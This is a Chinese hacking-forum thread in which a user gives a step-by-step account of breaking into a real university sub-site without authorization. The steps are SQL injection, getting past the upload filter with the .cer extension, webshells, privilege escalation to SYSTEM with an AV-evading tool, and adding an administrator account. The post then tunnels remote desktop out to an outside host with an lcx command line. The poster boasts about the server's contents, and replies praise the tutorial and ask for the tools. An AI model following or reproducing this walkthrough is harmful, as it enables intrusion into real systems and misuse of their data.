查看: 23390|回复: 19

提权某省理工大学分站学院

[复制链接]
  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2014-11-26 00:23:56 | 显示全部楼层 |阅读模式
    本帖最后由 蟹老板 于 2014-11-26 00:23 编辑

    先看看主页,恩   马赛克打得够漂亮~~
    zhuye.png
    首先是注入点,这个站安全做的太差了,随便找篇新闻,就有注入点。
    注入得到用户名密码 md5解密。这个就不细说了,新手也都会。今天主要说拿shell和提权。

    用注入到的密码进后台,后台地址Admin_Login.asp, 很好找。。。  顺便一提页面右下角就有。根本不用找。
    houtaixia.png

    这里验证码没显示出来,不用担心。随便输入就可以。
    yanzhengma.png

    进入后台,先找找上传吧,这个后台看起来权限比较多,应该很容易拿shell。
    houtai2.png

    添加文章那里上传图片格式有限制,那我们再找找,总有比较方面的办法。
    经过一番寻找,找到了网站配置信息。这里可以添加上传格式
    shangchuan.png
    我添加了个asp, 去添加文章上传一下试试,还是不行。

    aspbu.png
    然后我又在配置信息里添加了aaspsp,还是不行。  那咱们就试试cer吧。 添加个cer格式。然后把本地的小马后缀也改成cer。再次上传。成功。
    cer.png
    其实除了cer  还有一些格式也可以试试,比如ashx  这么多格式 总有一款适合你。
    好了 我们用小马添加个大马。还有一句话。
    然后用菜刀连接。   连接成功。


    下面说提权。(其实这个站我以前来过,为了写个原创帖子,我又进去一次。)
    先用菜刀查看一下权限吧。 执行whoami。
    jujue.png
    显示 拒绝访问。 不用担心,因为我用大马查看了一下, Wscript.Shell 这个组件是支持的。
    可能是目录问题。那么我们就自己上传个cmd.exe,到一个可读可写的目录去。
    一般情况下这个目录都是可以的 C:\RECYCLER\   好的  菜刀上传一个cmd到这个目录去。

    上传成功,  然后我们修改一下菜刀虚拟终端的位置  就可以执行cmd了。看我操作
    首先输入SETP C:\RECYCLER\cmd.exe  将菜刀执行的文件换成你上传的cmd路径,注意中间的空格。
    然后再查看一下是否成功。输入whoami。   OK   现在已经不再拒绝访问了。
    cmdsetp.png

    当然  现在这个权限是不足以创建用户的。
    adadadad.png

    这就需要我们先上传一个对应系统的iis.exe。   我之前查看了一下这个服务器的系统,是IIS6.0 那我们就传iis6用的iis.exe
    因为这个系统有主动防御。 所以最好传免杀的。
    传上去之后呢。我们使用一下。  iis.exe的使用方法也很简单。看操作
    只需在cmd下输入iis的路径和命令 格式如下
    C:\RECYCLER\iis.exe “要执行的cmd命令”   注意双引号和空格。

    我电脑卡了,  这个部分就没办法截图了。  反正就是这样执行,我就成功了。
    C:\RECYCLER\iis.exe "whoami"显示的是system权限。
    然后C:\RECYCLER\iis.exe "添加用户的命令"
    成功添加一个用户为管理员。

    好吧,接下来就是比较揪心的时候了。
    有了用户,那么远程连接一下吧。
    我们用大马查询一下对面注册表,看看远程端口是多少。用注册表查平时很好用。
    3389cha.png
    上面显示的是3389,  我去连接。 连接不上。
    在这上面我花了一些时间,最后才发现,注册表显示是错误的。 实际的是3390。

    我是用cmd查出3390的。
    具体怎么查呢,请看下面步骤。
    cmd输入 tasklist /svc   查看服务。 找到TermService 服务 记下他的PID
       pid.png

    然后再cmd输入 netstat -ano  查看所有端口。找到与刚才PID一样的端口。
    339000.png
    3390  就是他了。
    然后我连接远程桌面3390端口,  连接不上。 这里呢  我判断他应该是内网。
    那么  我们用lcx转发一下试试。
    上次有人说不会lcx,  那么这次我就说详细一点吧。
    lcxxx.png
    需要 cmd和lcx 放在同一个目录下。本地一份,上传到服务器一份。
    那么 仅仅几条命令就可以完成转发了。
    请记清楚端口。
    首先。本地监听命令
    lcx -listen 2222 3333
    这两个端口可以自己更改,但一定要没有被占用的。 如果这里更改端口,服务器上的命令端口也要更改,只需更改2222即可。
    本地监听.png

    然后我们在服务器上运行发送命令
    可以用菜刀执行。
    命令如下
    lcx -slave 123.123.123.123 2222 127.0.0.1 3389
    33902222.png
    图片里面的是3390,因为这个是我这台服务器的远程端口,默认的应该是3389
    回车即可, 。转发期间,不能关闭cmd窗口。切记。

    这样就lcx转发完成了,我们之间连接远程桌面。127.0.0.1:3333   
    33333.png
    连接的时候,刚才打开的cmd窗口会有数据传输,这是正常现象。
    然后就可以登录桌面了。
    chengggong.png
    登录成功。

    至此  本次渗透彻底结束。      希望大学网站注意安全。

    不挂黑页,不留痕迹。
    轻轻地来,又轻轻地走。
    我挥一挥衣袖,不带走一片云彩。


    还有就是。。。。。。。   服务器里面这么多AV 、种子、游戏。
    光是A片就有一百多G。。。。

    你们感受一下吧。
    xieeee.png

    youyyyyyy.jpg

    网站管理员,服务器内存都让你吃了~~~~
    tututututu.jpg


    最后说一句,为了让新手看得懂,这篇文我写了好久,天很冷,冻得手都麻了。版主给加点分哦。


    by  夜鸥

    评分

    参与人数 15i币 +170 收起 理由
    a197110 + 2 露出网站地址了 8 9 11 自己看哦.
    随风淡笑 + 2 留图不留种!
    小雨 + 2 发图不发种子差评
    1142099496 + 6 打的好码
    kellen + 10 这教程写得好..通谷易懂..一看就明白.
    Free_小东 + 28 科普贴
    BattleHeart + 6 权限问题只能给这么多~感谢你精彩的分享~.
    蓝色_ + 10 这个码打得有点技巧
    by无极 + 6 我就喜欢这马赛克
    契约 + 4 服务器里的资源,啧啧
    管理02 + 40 内容细节很明细
    90_ + 32 打得一手好码
    小志001 + 6 支持原创
    神仙 + 6 支持原创
    kali + 10 支持原创

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2017-6-1 14:33
  • 签到天数: 97 天

    [LV.6]常住居民II

    发表于 2014-11-26 09:08:45 | 显示全部楼层
    太给力啦!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-1-18 18:16
  • 签到天数: 13 天

    [LV.3]偶尔看看II

    发表于 2014-11-26 10:12:11 | 显示全部楼层
    给力的楼主,给你支持一个
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2018-12-13 14:00
  • 签到天数: 26 天

    [LV.4]偶尔看看III

    发表于 2014-11-26 15:40:50 | 显示全部楼层
    LZ你好,马赛克打得不好,谷歌一下就搜索出来了

    点评

    咳咳。。 不要说出来嘛。。。  详情 回复 发表于 2014-11-26 17:08
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2018-12-13 14:00
  • 签到天数: 26 天

    [LV.4]偶尔看看III

    发表于 2014-11-26 15:57:58 | 显示全部楼层
    顺便求一下那个cmd.exe iis.exe 还有lcx.exe,我找好久都木有找到

    点评

    cmd每个电脑上基本上都有。 lcx百度一抓一大把呢。  详情 回复 发表于 2014-11-26 17:03
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-11-26 16:11:57 | 显示全部楼层
    我怎么感觉后面是重点

    点评

    那是亮点。。。 彩蛋。  详情 回复 发表于 2014-11-26 17:02
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2014-11-26 17:02:23 | 显示全部楼层
    犯贱1314 发表于 2014-11-26 16:11
    我怎么感觉后面是重点

    那是亮点。。。   彩蛋。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2014-11-26 17:03:35 | 显示全部楼层
    testKai 发表于 2014-11-26 15:57
    顺便求一下那个cmd.exe iis.exe 还有lcx.exe,我找好久都木有找到

    cmd每个电脑上基本上都有。   lcx百度一抓一大把呢。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2014-11-26 17:08:23 | 显示全部楼层
    testKai 发表于 2014-11-26 15:40
    LZ你好,马赛克打得不好,谷歌一下就搜索出来了

    咳咳。。  不要说出来嘛。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-8-27 01:19
  • 签到天数: 50 天

    [LV.5]常住居民I

    发表于 2014-11-26 19:33:37 | 显示全部楼层
    真的很给力啊  楼主能把服务器里的xx资源网盘吗
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-24 01:14 , Processed in 0.046792 second(s), 24 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部